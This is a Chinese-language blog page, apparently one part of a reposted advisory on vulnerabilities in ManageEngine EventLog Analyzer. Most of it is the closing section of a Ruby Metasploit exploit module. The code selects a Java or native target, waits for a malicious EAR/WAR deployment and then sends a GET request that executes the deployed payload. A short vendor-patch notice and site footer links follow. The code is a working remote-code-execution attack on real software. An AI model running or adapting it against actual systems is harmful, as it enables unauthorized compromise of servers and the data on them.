ManageEngine EventLog Analyzer多个安全漏洞(4)

日期:2020-09-03 栏目:程序人生 浏览:

print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
    sleep(datastore['SLEEP'])
    return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
  end


  def exploit
    @my_target = pick_target
    if @my_target.nil?
      print_error("#{peer} - Unable to select a target, we must bail.")
      return
    else
      print_status("#{peer} - Selected target #{@my_target.name}")
    end

if @my_target == targets[1]
      exploit_path = exploit_java
    else
      exploit_path = exploit_native
    end

print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri(exploit_path),
      'method' => 'GET'
    })
  end
 end

建议:
--------------------------------------------------------------------------------
厂商补丁:

ManageEngine
 ------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

上一篇:ThinkPHP结合ajax、Mysql实现的客户端通信功能代码示
下一篇:ThinkPHP3.1新特性之动态设置自动完成及自动验证示

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/4c0883564f5f59491b2fa76f3b4b5fc3.html

相关推荐